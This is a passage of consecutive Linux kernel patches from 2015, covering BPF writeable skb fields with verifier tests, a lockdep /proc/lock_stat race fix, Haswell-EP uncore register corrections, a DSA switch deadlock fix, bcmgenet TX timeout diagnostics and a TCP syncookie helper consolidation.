IS_PSEUDO | sizeof(new_ip)); bpf_l3_csum_replace(skb, IP_CSUM_OFF, old_ip, new_ip, sizeof(new_ip)); @@ -44,7 +44,7 @@ static inline void set_tcp_ip_src(struct __sk_buff *skb, __u32 new_ip) #define TCP_DPORT_OFF (ETH_HLEN + sizeof(struct iphdr) + offsetof(struct tcphdr, dest)) static inline void set_tcp_dest_port(struct __sk_buff *skb, __u16 new_port) { - __u16 old_port = htons(load_half(skb, BPF_LL_OFF + TCP_DPORT_OFF)); + __u16 old_port = htons(load_half(skb, TCP_DPORT_OFF)); bpf_l4_csum_replace(skb, TCP_CSUM_OFF, old_port, new_port, sizeof(new_port)); bpf_skb_store_bytes(skb, TCP_DPORT_OFF, &new_port, sizeof(new_port), 0); @@ -53,7 +53,7 @@ static inline void set_tcp_dest_port(struct __sk_buff *skb, __u16 new_port) SEC("classifier") int bpf_prog1(struct __sk_buff *skb) { - __u8 proto = load_byte(skb, BPF_LL_OFF + ETH_HLEN + offsetof(struct iphdr, protocol)); + __u8 proto = load_byte(skb, ETH_HLEN + offsetof(struct iphdr, protocol)); long *value; if (proto == IPPROTO_TCP) { From d691f9e8d4405c334aa10d556e73c8bf44cb0e01 Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Thu, 4 Jun 2015 10:11:54 -0700 Subject: [PATCH 748/872] bpf: allow programs to write to certain skb fields allow programs read/write skb->mark, tc_index fields and ((struct qdisc_skb_cb *)cb)->data. mark and tc_index are generically useful in TC. cb[0]-cb[4] are primarily used to pass arguments from one program to another called via bpf_tail_call() which can be seen in sockex3_kern.c example. All fields of 'struct __sk_buff' are readable to socket and tc_cls_act progs. mark, tc_index are writeable from tc_cls_act only. cb[0]-cb[4] are writeable by both sockets and tc_cls_act. Add verifier tests and improve sample code. Signed-off-by: Alexei Starovoitov Signed-off-by: David S. Miller --- include/linux/bpf.h | 3 +- include/uapi/linux/bpf.h | 2 + kernel/bpf/verifier.c | 37 +++++++++++---- net/core/filter.c | 94 ++++++++++++++++++++++++++++++++----- samples/bpf/sockex3_kern.c | 35 +++++--------- samples/bpf/test_verifier.c | 84 ++++++++++++++++++++++++++++++++- 6 files changed, 207 insertions(+), 48 deletions(-) diff --git a/include/linux/bpf.h b/include/linux/bpf.h index ca854e5bb2f7..2235aee8096a 100644 --- a/include/linux/bpf.h +++ b/include/linux/bpf.h @@ -105,7 +105,8 @@ struct bpf_verifier_ops { */ bool (*is_valid_access)(int off, int size, enum bpf_access_type type); - u32 (*convert_ctx_access)(int dst_reg, int src_reg, int ctx_off, + u32 (*convert_ctx_access)(enum bpf_access_type type, int dst_reg, + int src_reg, int ctx_off, struct bpf_insn *insn); }; diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h index 42aa19abab86..602f05b7a275 100644 --- a/include/uapi/linux/bpf.h +++ b/include/uapi/linux/bpf.h @@ -248,6 +248,8 @@ struct __sk_buff { __u32 priority; __u32 ingress_ifindex; __u32 ifindex; + __u32 tc_index; + __u32 cb[5]; }; #endif /* _UAPI__LINUX_BPF_H__ */ diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c index cfd9a40b9a5a..039d866fd36a 100644 --- a/kernel/bpf/verifier.c +++ b/kernel/bpf/verifier.c @@ -1692,6 +1692,8 @@ static int do_check(struct verifier_env *env) } } else if (class == BPF_STX) { + enum bpf_reg_type dst_reg_type; + if (BPF_MODE(insn->code) == BPF_XADD) { err = check_xadd(env, insn); if (err) @@ -1700,11 +1702,6 @@ static int do_check(struct verifier_env *env) continue; } - if (BPF_MODE(insn->code) != BPF_MEM || - insn->imm != 0) { - verbose("BPF_STX uses reserved fields\n"); - return -EINVAL; - } /* check src1 operand */ err = check_reg_arg(regs, insn->src_reg, SRC_OP); if (err) @@ -1714,6 +1711,8 @@ static int do_check(struct verifier_env *env) if (err) return err; + dst_reg_type = regs[insn->dst_reg].type; + /* check that memory (dst_reg + off) is writeable */ err = check_mem_access(env, insn->dst_reg, insn->off, BPF_SIZE(insn->code), BPF_WRITE, @@ -1721,6 +1720,15 @@ static int do_check(struct verifier_env *env) if (err) return err; + if (insn->imm == 0) { + insn->imm = dst_reg_type; + } else if (dst_reg_type != insn->imm && + (dst_reg_type == PTR_TO_CTX || + insn->imm == PTR_TO_CTX)) { + verbose("same insn cannot be used with different pointers\n"); + return -EINVAL; + } + } else if (class == BPF_ST) { if (BPF_MODE(insn->code) != BPF_MEM || insn->src_reg != BPF_REG_0) { @@ -1839,12 +1847,18 @@ static int replace_map_fd_with_map_ptr(struct verifier_env *env) for (i = 0; i < insn_cnt; i++, insn++) { if (BPF_CLASS(insn->code) == BPF_LDX && - (BPF_MODE(insn->code) != BPF_MEM || - insn->imm != 0)) { + (BPF_MODE(insn->code) != BPF_MEM || insn->imm != 0)) { verbose("BPF_LDX uses reserved fields\n"); return -EINVAL; } + if (BPF_CLASS(insn->code) == BPF_STX && + ((BPF_MODE(insn->code) != BPF_MEM && + BPF_MODE(insn->code) != BPF_XADD) || insn->imm != 0)) { + verbose("BPF_STX uses reserved fields\n"); + return -EINVAL; + } + if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) { struct bpf_map *map; struct fd f; @@ -1967,12 +1981,17 @@ static int convert_ctx_accesses(struct verifier_env *env) struct bpf_prog *new_prog; u32 cnt; int i; + enum bpf_access_type type; if (!env->prog->aux->ops->convert_ctx_access) return 0; for (i = 0; i < insn_cnt; i++, insn++) { - if (insn->code != (BPF_LDX | BPF_MEM | BPF_W)) + if (insn->code == (BPF_LDX | BPF_MEM | BPF_W)) + type = BPF_READ; + else if (insn->code == (BPF_STX | BPF_MEM | BPF_W)) + type = BPF_WRITE; + else continue; if (insn->imm != PTR_TO_CTX) { @@ -1982,7 +2001,7 @@ static int convert_ctx_accesses(struct verifier_env *env) } cnt = env->prog->aux->ops-> - convert_ctx_access(insn->dst_reg, insn->src_reg, + convert_ctx_access(type, insn->dst_reg, insn->src_reg, insn->off, insn_buf); if (cnt == 0 || cnt >= ARRAY_SIZE(insn_buf)) { verbose("bpf verifier is misconfigured\n"); diff --git a/net/core/filter.c b/net/core/filter.c index 36a69e33d76b..d271c06bf01f 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -46,6 +46,7 @@ #include #include #include +#include /** * sk_filter - run a packet through a socket filter @@ -1463,13 +1464,8 @@ tc_cls_act_func_proto(enum bpf_func_id func_id) } } -static bool sk_filter_is_valid_access(int off, int size, - enum bpf_access_type type) +static bool __is_valid_access(int off, int size, enum bpf_access_type type) { - /* only read is allowed */ - if (type != BPF_READ) - return false; - /* check bounds */ if (off < 0 || off >= sizeof(struct __sk_buff)) return false; @@ -1485,8 +1481,42 @@ static bool sk_filter_is_valid_access(int off, int size, return true; } -static u32 sk_filter_convert_ctx_access(int dst_reg, int src_reg, int ctx_off, - struct bpf_insn *insn_buf) +static bool sk_filter_is_valid_access(int off, int size, + enum bpf_access_type type) +{ + if (type == BPF_WRITE) { + switch (off) { + case offsetof(struct __sk_buff, cb[0]) ... + offsetof(struct __sk_buff, cb[4]): + break; + default: + return false; + } + } + + return __is_valid_access(off, size, type); +} + +static bool tc_cls_act_is_valid_access(int off, int size, + enum bpf_access_type type) +{ + if (type == BPF_WRITE) { + switch (off) { + case offsetof(struct __sk_buff, mark): + case offsetof(struct __sk_buff, tc_index): + case offsetof(struct __sk_buff, cb[0]) ... + offsetof(struct __sk_buff, cb[4]): + break; + default: + return false; + } + } + return __is_valid_access(off, size, type); +} + +static u32 bpf_net_convert_ctx_access(enum bpf_access_type type, int dst_reg, + int src_reg, int ctx_off, + struct bpf_insn *insn_buf) { struct bpf_insn *insn = insn_buf; @@ -1538,7 +1568,15 @@ static u32 sk_filter_convert_ctx_access(int dst_reg, int src_reg, int ctx_off, break; case offsetof(struct __sk_buff, mark): - return convert_skb_access(SKF_AD_MARK, dst_reg, src_reg, insn); + BUILD_BUG_ON(FIELD_SIZEOF(struct sk_buff, mark) != 4); + + if (type == BPF_WRITE) + *insn++ = BPF_STX_MEM(BPF_W, dst_reg, src_reg, + offsetof(struct sk_buff, mark)); + else + *insn++ = BPF_LDX_MEM(BPF_W, dst_reg, src_reg, + offsetof(struct sk_buff, mark)); + break; case offsetof(struct __sk_buff, pkt_type): return convert_skb_access(SKF_AD_PKTTYPE, dst_reg, src_reg, insn); @@ -1553,6 +1591,38 @@ static u32 sk_filter_convert_ctx_access(int dst_reg, int src_reg, int ctx_off, case offsetof(struct __sk_buff, vlan_tci): return convert_skb_access(SKF_AD_VLAN_TAG, dst_reg, src_reg, insn); + + case offsetof(struct __sk_buff, cb[0]) ... + offsetof(struct __sk_buff, cb[4]): + BUILD_BUG_ON(FIELD_SIZEOF(struct qdisc_skb_cb, data) < 20); + + ctx_off -= offsetof(struct __sk_buff, cb[0]); + ctx_off += offsetof(struct sk_buff, cb); + ctx_off += offsetof(struct qdisc_skb_cb, data); + if (type == BPF_WRITE) + *insn++ = BPF_STX_MEM(BPF_W, dst_reg, src_reg, ctx_off); + else + *insn++ = BPF_LDX_MEM(BPF_W, dst_reg, src_reg, ctx_off); + break; + + case offsetof(struct __sk_buff, tc_index): +#ifdef CONFIG_NET_SCHED + BUILD_BUG_ON(FIELD_SIZEOF(struct sk_buff, tc_index) != 2); + + if (type == BPF_WRITE) + *insn++ = BPF_STX_MEM(BPF_H, dst_reg, src_reg, + offsetof(struct sk_buff, tc_index)); + else + *insn++ = BPF_LDX_MEM(BPF_H, dst_reg, src_reg, + offsetof(struct sk_buff, tc_index)); + break; +#else + if (type == BPF_WRITE) + *insn++ = BPF_MOV64_REG(dst_reg, dst_reg); + else + *insn++ = BPF_MOV64_IMM(dst_reg, 0); + break; +#endif } return insn - insn_buf; @@ -1561,13 +1631,13 @@ static u32 sk_filter_convert_ctx_access(int dst_reg, int src_reg, int ctx_off, static const struct bpf_verifier_ops sk_filter_ops = { .get_func_proto = sk_filter_func_proto, .is_valid_access = sk_filter_is_valid_access, - .convert_ctx_access = sk_filter_convert_ctx_access, + .convert_ctx_access = bpf_net_convert_ctx_access, }; static const struct bpf_verifier_ops tc_cls_act_ops = { .get_func_proto = tc_cls_act_func_proto, - .is_valid_access = sk_filter_is_valid_access, - .convert_ctx_access = sk_filter_convert_ctx_access, + .is_valid_access = tc_cls_act_is_valid_access, + .convert_ctx_access = bpf_net_convert_ctx_access, }; static struct bpf_prog_type_list sk_filter_type __read_mostly = { diff --git a/samples/bpf/sockex3_kern.c b/samples/bpf/sockex3_kern.c index 2625b987944f..41ae2fd21b13 100644 --- a/samples/bpf/sockex3_kern.c +++ b/samples/bpf/sockex3_kern.c @@ -89,7 +89,6 @@ static inline __u32 ipv6_addr_hash(struct __sk_buff *ctx, __u64 off) struct globals { struct flow_keys flow; - __u32 nhoff; }; struct bpf_map_def SEC("maps") percpu_map = { @@ -139,7 +138,7 @@ static void update_stats(struct __sk_buff *skb, struct globals *g) static __always_inline void parse_ip_proto(struct __sk_buff *skb, struct globals *g, __u32 ip_proto) { - __u32 nhoff = g->nhoff; + __u32 nhoff = skb->cb[0]; int poff; switch (ip_proto) { @@ -165,7 +164,7 @@ static __always_inline void parse_ip_proto(struct __sk_buff *skb, if (gre_flags & GRE_SEQ) nhoff += 4; - g->nhoff = nhoff; + skb->cb[0] = nhoff; parse_eth_proto(skb, gre_proto); break; } @@ -195,7 +194,7 @@ PROG(PARSE_IP)(struct __sk_buff *skb) if (!g) return 0; - nhoff = g->nhoff; + nhoff = skb->cb[0]; if (unlikely(ip_is_fragment(skb, nhoff))) return 0; @@ -210,7 +209,7 @@ PROG(PARSE_IP)(struct __sk_buff *skb) verlen = load_byte(skb, nhoff + 0/*offsetof(struct iphdr, ihl)*/); nhoff += (verlen & 0xF) << 2; - g->nhoff = nhoff; + skb->cb[0] = nhoff; parse_ip_proto(skb, g, ip_proto); return 0; } @@ -223,7 +222,7 @@ PROG(PARSE_IPV6)(struct __sk_buff *skb) if (!g) return 0; - nhoff = g->nhoff; + nhoff = skb->cb[0]; ip_proto = load_byte(skb, nhoff + offsetof(struct ipv6hdr, nexthdr)); @@ -233,25 +232,21 @@ PROG(PARSE_IPV6)(struct __sk_buff *skb) nhoff + offsetof(struct ipv6hdr, daddr)); nhoff += sizeof(struct ipv6hdr); - g->nhoff = nhoff; + skb->cb[0] = nhoff; parse_ip_proto(skb, g, ip_proto); return 0; } PROG(PARSE_VLAN)(struct __sk_buff *skb) { - struct globals *g = this_cpu_globals(); __u32 nhoff, proto; - if (!g) - return 0; - - nhoff = g->nhoff; + nhoff = skb->cb[0]; proto = load_half(skb, nhoff + offsetof(struct vlan_hdr, h_vlan_encapsulated_proto)); nhoff += sizeof(struct vlan_hdr); - g->nhoff = nhoff; + skb->cb[0] = nhoff; parse_eth_proto(skb, proto); @@ -260,17 +255,13 @@ PROG(PARSE_VLAN)(struct __sk_buff *skb) PROG(PARSE_MPLS)(struct __sk_buff *skb) { - struct globals *g = this_cpu_globals(); __u32 nhoff, label; - if (!g) - return 0; - - nhoff = g->nhoff; + nhoff = skb->cb[0]; label = load_word(skb, nhoff); nhoff += sizeof(struct mpls_label); - g->nhoff = nhoff; + skb->cb[0] = nhoff; if (label & MPLS_LS_S_MASK) { __u8 verlen = load_byte(skb, nhoff); @@ -288,14 +279,10 @@ PROG(PARSE_MPLS)(struct __sk_buff *skb) SEC("socket/0") int main_prog(struct __sk_buff *skb) { - struct globals *g = this_cpu_globals(); __u32 nhoff = ETH_HLEN; __u32 proto = load_half(skb, 12); - if (!g) - return 0; - - g->nhoff = nhoff; + skb->cb[0] = nhoff; parse_eth_proto(skb, proto); return 0; } diff --git a/samples/bpf/test_verifier.c b/samples/bpf/test_verifier.c index 12f3780af73f..693605997abc 100644 --- a/samples/bpf/test_verifier.c +++ b/samples/bpf/test_verifier.c @@ -29,6 +29,7 @@ struct bpf_test { ACCEPT, REJECT } result; + enum bpf_prog_type prog_type; }; static struct bpf_test tests[] = { @@ -743,6 +744,84 @@ static struct bpf_test tests[] = { .errstr = "different pointers", .result = REJECT, }, + { + "check skb->mark is not writeable by sockets", + .insns = { + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_1, + offsetof(struct __sk_buff, mark)), + BPF_EXIT_INSN(), + }, + .errstr = "invalid bpf_context access", + .result = REJECT, + }, + { + "check skb->tc_index is not writeable by sockets", + .insns = { + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_1, + offsetof(struct __sk_buff, tc_index)), + BPF_EXIT_INSN(), + }, + .errstr = "invalid bpf_context access", + .result = REJECT, + }, + { + "check non-u32 access to cb", + .insns = { + BPF_STX_MEM(BPF_H, BPF_REG_1, BPF_REG_1, + offsetof(struct __sk_buff, cb[0])), + BPF_EXIT_INSN(), + }, + .errstr = "invalid bpf_context access", + .result = REJECT, + }, + { + "check out of range skb->cb access", + .insns = { + BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, + offsetof(struct __sk_buff, cb[60])), + BPF_EXIT_INSN(), + }, + .errstr = "invalid bpf_context access", + .result = REJECT, + .prog_type = BPF_PROG_TYPE_SCHED_ACT, + }, + { + "write skb fields from socket prog", + .insns = { + BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, + offsetof(struct __sk_buff, cb[4])), + BPF_JMP_IMM(BPF_JGE, BPF_REG_0, 0, 1), + BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, + offsetof(struct __sk_buff, mark)), + BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, + offsetof(struct __sk_buff, tc_index)), + BPF_JMP_IMM(BPF_JGE, BPF_REG_0, 0, 1), + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_1, + offsetof(struct __sk_buff, cb[0])), + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_1, + offsetof(struct __sk_buff, cb[2])), + BPF_EXIT_INSN(), + }, + .result = ACCEPT, + }, + { + "write skb fields from tc_cls_act prog", + .insns = { + BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, + offsetof(struct __sk_buff, cb[0])), + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_0, + offsetof(struct __sk_buff, mark)), + BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, + offsetof(struct __sk_buff, tc_index)), + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_0, + offsetof(struct __sk_buff, tc_index)), + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_0, + offsetof(struct __sk_buff, cb[3])), + BPF_EXIT_INSN(), + }, + .result = ACCEPT, + .prog_type = BPF_PROG_TYPE_SCHED_CLS, + }, }; static int probe_filter_length(struct bpf_insn *fp) @@ -775,6 +854,7 @@ static int test(void) for (i = 0; i < ARRAY_SIZE(tests); i++) { struct bpf_insn *prog = tests[i].insns; + int prog_type = tests[i].prog_type; int prog_len = probe_filter_length(prog); int *fixup = tests[i].fixup; int map_fd = -1; @@ -789,8 +869,8 @@ static int test(void) } printf("#%d %s ", i, tests[i].descr); - prog_fd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, - prog_len * sizeof(struct bpf_insn), + prog_fd = bpf_prog_load(prog_type ?: BPF_PROG_TYPE_SOCKET_FILTER, + prog, prog_len * sizeof(struct bpf_insn), "GPL", 0); if (tests[i].result == ACCEPT) { From cee34d88cabd1ba5fc93e09b5b12232bc9338c7c Mon Sep 17 00:00:00 2001 From: Peter Zijlstra Date: Tue, 2 Jun 2015 12:50:13 +0200 Subject: [PATCH 749/872] lockdep: Fix a race between /proc/lock_stat and module unload The lock_class iteration of /proc/lock_stat is not serialized against the lockdep_free_key_range() call from module unload. Therefore it can happen that we find a class of which ->name/->key are no longer valid. There is a further bug in zap_class() that left ->name dangling. Cure this. Use RCU_INIT_POINTER() because NULL. Since lockdep_free_key_range() is rcu_sched serialized, we can read both ->name and ->key under rcu_read_lock_sched() (preempt-disable) and be assured that if we observe a !NULL value it stays safe to use for as long as we hold that lock. If we observe both NULL, skip the entry. Reported-by: Jerome Marchand Tested-by: Jerome Marchand Signed-off-by: Peter Zijlstra (Intel) Cc: Andrew Morton Cc: H. Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Link: http://lkml.kernel.org/r/20150602105013.GS3644@twins.programming.kicks-ass.net Signed-off-by: Ingo Molnar --- kernel/locking/lockdep.c | 3 ++- kernel/locking/lockdep_proc.c | 22 +++++++++++++++++----- 2 files changed, 19 insertions(+), 6 deletions(-) diff --git a/kernel/locking/lockdep.c b/kernel/locking/lockdep.c index a0831e1b99f4..aaeae885d9af 100644 --- a/kernel/locking/lockdep.c +++ b/kernel/locking/lockdep.c @@ -3900,7 +3900,8 @@ static void zap_class(struct lock_class *class) list_del_rcu(&class->hash_entry); list_del_rcu(&class->lock_entry); - class->key = NULL; + RCU_INIT_POINTER(class->key, NULL); + RCU_INIT_POINTER(class->name, NULL); } static inline int within(const void *addr, void *start, unsigned long size) diff --git a/kernel/locking/lockdep_proc.c b/kernel/locking/lockdep_proc.c index ef43ac4bafb5..d83d798bef95 100644 --- a/kernel/locking/lockdep_proc.c +++ b/kernel/locking/lockdep_proc.c @@ -426,10 +426,12 @@ static void seq_lock_time(struct seq_file *m, struct lock_time *lt) static void seq_stats(struct seq_file *m, struct lock_stat_data *data) { - char name[39]; - struct lock_class *class; + struct lockdep_subclass_key *ckey; struct lock_class_stats *stats; + struct lock_class *class; + const char *cname; int i, namelen; + char name[39]; class = data->class; stats = &data->stats; @@ -440,15 +442,25 @@ static void seq_stats(struct seq_file *m, struct lock_stat_data *data) if (class->subclass) namelen -= 2; - if (!class->name) { + rcu_read_lock_sched(); + cname = rcu_dereference_sched(class->name); + ckey = rcu_dereference_sched(class->key); + + if (!cname && !ckey) { + rcu_read_unlock_sched(); + return; + + } else if (!cname) { char str[KSYM_NAME_LEN]; const char *key_name; - key_name = __get_key_name(class->key, str); + key_name = __get_key_name(ckey, str); snprintf(name, namelen, "%s", key_name); } else { - snprintf(name, namelen, "%s", class->name); + snprintf(name, namelen, "%s", cname); } + rcu_read_unlock_sched(); + namelen = strlen(name); if (class->name_version > 1) { snprintf(name+namelen, 3, "#%d", class->name_version); From 8cf1a3de97804b047973dd44cfacdc1930da8403 Mon Sep 17 00:00:00 2001 From: Kan Liang Date: Tue, 26 May 2015 09:10:35 -0400 Subject: [PATCH 750/872] perf/x86/intel/uncore: Fix CBOX bit wide and UBOX reg on Haswell-EP CBOX counters are increased to 48b on HSX. Correct the MSR address for HSWEP_U_MSR_PMON_CTR0 and HSWEP_U_MSR_PMON_CTL0. See specification in: http://www.intel.com/content/www/us/en/processors/xeon/ xeon-e5-v3-uncore-performance-monitoring.html Signed-off-by: Kan Liang Signed-off-by: Peter Zijlstra (Intel) Cc: Andrew Morton Cc: H. Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Link: http://lkml.kernel.org/r/1432645835-7918-1-git-send-email-kan.liang@intel.com Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event_intel_uncore_snbep.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/arch/x86/kernel/cpu/perf_event_intel_uncore_snbep.c b/arch/x86/kernel/cpu/perf_event_intel_uncore_snbep.c index 12d9548457e7..6d6e85dd5849 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_uncore_snbep.c +++ b/arch/x86/kernel/cpu/perf_event_intel_uncore_snbep.c @@ -164,8 +164,8 @@ ((1ULL << (n)) - 1))) /* Haswell-EP Ubox */ -#define HSWEP_U_MSR_PMON_CTR0 0x705 -#define HSWEP_U_MSR_PMON_CTL0 0x709 +#define HSWEP_U_MSR_PMON_CTR0 0x709 +#define HSWEP_U_MSR_PMON_CTL0 0x705 #define HSWEP_U_MSR_PMON_FILTER 0x707 #define HSWEP_U_MSR_PMON_UCLK_FIXED_CTL 0x703 @@ -1914,7 +1914,7 @@ static struct intel_uncore_type hswep_uncore_cbox = { .name = "cbox", .num_counters = 4, .num_boxes = 18, - .perf_ctr_bits = 44, + .perf_ctr_bits = 48, .event_ctl = HSWEP_C0_MSR_PMON_CTL0, .perf_ctr = HSWEP_C0_MSR_PMON_CTR0, .event_mask = SNBEP_CBO_MSR_PMON_RAW_EVENT_MASK, From 80edb722b919500450e83c49c20a9dc706de2fa6 Mon Sep 17 00:00:00 2001 From: Andrew Lunn Date: Fri, 5 Jun 2015 01:10:09 +0200 Subject: [PATCH 751/872] net: dsa: mv88e6xxx: Fix deadlock by double lock ethtool -S on a DSA interface can deadlock for some switches because the same lock is taken twice. Use the register read function which expects the lock to be already held. Signed-off-by: Andrew Lunn Fixes: 31888234b736 ("net: dsa: mv88e6xxx: Replace stats mutex with SMI mutex") Signed-off-by: David S. Miller --- drivers/net/dsa/mv88e6xxx.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/dsa/mv88e6xxx.c b/drivers/net/dsa/mv88e6xxx.c index 7fba330ce702..39530fa142b0 100644 --- a/drivers/net/dsa/mv88e6xxx.c +++ b/drivers/net/dsa/mv88e6xxx.c @@ -703,8 +703,8 @@ static void _mv88e6xxx_get_ethtool_stats(struct dsa_switch *ds, u32 high = 0; if (s->reg >= 0x100) { - ret = mv88e6xxx_reg_read(ds, REG_PORT(port), - s->reg - 0x100); + ret = _mv88e6xxx_reg_read(ds, REG_PORT(port), + s->reg - 0x100); if (ret < 0) goto error; low = ret; From 13ea657806cf73b379a0109f7042182f47c351a7 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Thu, 4 Jun 2015 16:15:50 -0700 Subject: [PATCH 752/872] net: bcmgenet: improve TX timeout Dump useful ring statistics along with interrupt status, software maintained pointers and hardware registers to help troubleshoot TX queue stalls. When a timeout occurs, disable TX NAPI for the rings, dump their states while interrupts are disabled, re-enable interrupts, NAPI and queue flow control to help with the recovery. Signed-off-by: Florian Fainelli Signed-off-by: David S. Miller --- .../net/ethernet/broadcom/genet/bcmgenet.c | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c index 6043734ea613..b43b2cb9b830 100644 --- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c +++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c @@ -2770,12 +2770,79 @@ static int bcmgenet_close(struct net_device *dev) return ret; } +static void bcmgenet_dump_tx_queue(struct bcmgenet_tx_ring *ring) +{ + struct bcmgenet_priv *priv = ring->priv; + u32 p_index, c_index, intsts, intmsk; + struct netdev_queue *txq; + unsigned int free_bds; + unsigned long flags; + bool txq_stopped; + + if (!netif_msg_tx_err(priv)) + return; + + txq = netdev_get_tx_queue(priv->dev, ring->queue); + + spin_lock_irqsave(&ring->lock, flags); + if (ring->index == DESC_INDEX) { + intsts = ~bcmgenet_intrl2_0_readl(priv, INTRL2_CPU_MASK_STATUS); + intmsk = UMAC_IRQ_TXDMA_DONE | UMAC_IRQ_TXDMA_MBDONE; + } else { + intsts = ~bcmgenet_intrl2_1_readl(priv, INTRL2_CPU_MASK_STATUS); + intmsk = 1 << ring->index; + } + c_index = bcmgenet_tdma_ring_readl(priv, ring->index, TDMA_CONS_INDEX); + p_index = bcmgenet_tdma_ring_readl(priv, ring->index, TDMA_PROD_INDEX); + txq_stopped = netif_tx_queue_stopped(txq); + free_bds = ring->free_bds; + spin_unlock_irqrestore(&ring->lock, flags); + + netif_err(priv, tx_err, priv->dev, "Ring %d queue %d status summary\n" + "TX queue status: %s, interrupts: %s\n" + "(sw)free_bds: %d (sw)size: %d\n" + "(sw)p_index: %d (hw)p_index: %d\n" + "(sw)c_index: %d (hw)c_index: %d\n" + "(sw)clean_p: %d (sw)write_p: %d\n" + "(sw)cb_ptr: %d (sw)end_ptr: %d\n", + ring->index, ring->queue, + txq_stopped ? "stopped" : "active", + intsts & intmsk ? "enabled" : "disabled", + free_bds, ring->size, + ring->prod_index, p_index & DMA_P_INDEX_MASK, + ring->c_index, c_index & DMA_C_INDEX_MASK, + ring->clean_ptr, ring->write_ptr, + ring->cb_ptr, ring->end_ptr); +} + static void bcmgenet_timeout(struct net_device *dev) { struct bcmgenet_priv *priv = netdev_priv(dev); + u32 int0_enable = 0; + u32 int1_enable = 0; + unsigned int q; netif_dbg(priv, tx_err, dev, "bcmgenet_timeout\n"); + bcmgenet_disable_tx_napi(priv); + + for (q = 0; q < priv->hw_params->tx_queues; q++) + bcmgenet_dump_tx_queue(&priv->tx_rings[q]); + bcmgenet_dump_tx_queue(&priv->tx_rings[DESC_INDEX]); + + bcmgenet_tx_reclaim_all(dev); + + for (q = 0; q < priv->hw_params->tx_queues; q++) + int1_enable |= (1 << q); + + int0_enable = UMAC_IRQ_TXDMA_DONE; + + /* Re-enable TX interrupts if disabled */ + bcmgenet_intrl2_0_writel(priv, int0_enable, INTRL2_CPU_MASK_CLEAR); + bcmgenet_intrl2_1_writel(priv, int1_enable, INTRL2_CPU_MASK_CLEAR); + + bcmgenet_enable_tx_napi(priv); + dev->trans_start = jiffies; dev->stats.tx_errors++; From b80c0e78582d4a3a004dc1ade4eb06babc6a4eea Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Thu, 4 Jun 2015 18:30:43 -0700 Subject: [PATCH 753/872] tcp: get_cookie_sock() consolidation IPv4 and IPv6 share same implementation of get_cookie_sock(), and there is no point inlining it. We add tcp_ prefix to the common helper name and export it. Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- include/net/tcp.h | 3 +++ net/ipv4/syncookies.c | 10 +++++----- net/ipv6/syncookies.c | 19 +------------------ 3 files changed, 9 insertions(+), 23 deletions(-) diff --git a/include/net/tcp.h b/include/net/tcp.h index 2bb2bad21d5c..978cebedd3fc 100644 --- a/include/net/tcp.h +++ b/include/net/tcp.h @@ -469,6 +469,9 @@ int tcp_send_rcvq(struct sock *sk, struct msghdr *msg, size_t size); void inet_sk_rx_dst_set(struct sock *sk, const struct sk_buff *skb); /* From syncookies.c */ +struct sock *tcp_get_cookie_sock(struct sock *sk, struct sk_buff *skb, + struct request_sock *req, + struct dst_entry *dst); int __cookie_v4_check(const struct iphdr *iph, const struct tcphdr *th, u32 cookie); struct sock *cookie_v4_check(struct sock *sk, struct sk_buff *skb); diff --git a/net/ipv4/syncookies.c b/net/ipv4/syncookies.c index df849e5a10f1..d70b1f603692 100644 --- a/net/ipv4/syncookies.c +++ b/net/ipv4/syncookies.c @@ -219,9 +219,9 @@ int __cookie_v4_check(const struct iphdr *iph, const struct tcphdr *th, } EXPORT_SYMBOL_GPL(__cookie_v4_check); -static struct sock *get_cookie_sock(struct sock *sk, struct sk_buff *skb, - struct request_sock *req, - struct dst_entry *dst) +struct sock *tcp_get_cookie_sock(struct sock *sk, struct sk_buff *skb, + struct request_sock *req, + struct dst_entry *dst) { struct inet_connection_sock *icsk = inet_csk(sk); struct sock *child; @@ -235,7 +235,7 @@ static struct sock *get_cookie_sock(struct sock *sk, struct sk_buff *skb, } return child; } - +EXPORT_SYMBOL(tcp_get_cookie_sock); /* * when syncookies are in effect and tcp timestamps are enabled we stored @@ -391,7 +391,7 @@ struct sock *cookie_v4_check(struct sock *sk, struct sk_buff *skb) ireq->rcv_wscale = rcv_wscale; ireq->ecn_ok = cookie_ecn_ok(&tcp_opt, sock_net(sk), &rt->dst); - ret = get_cookie_sock(sk, skb, req, &rt->dst); + ret = tcp_get_cookie_sock(sk, skb, req, &rt->dst); /* ip_queue_xmit() depends on our flow being setup * Normal sockets get it right from inet_csk_route_child_sock() */ diff --git a/net/ipv6/syncookies.c 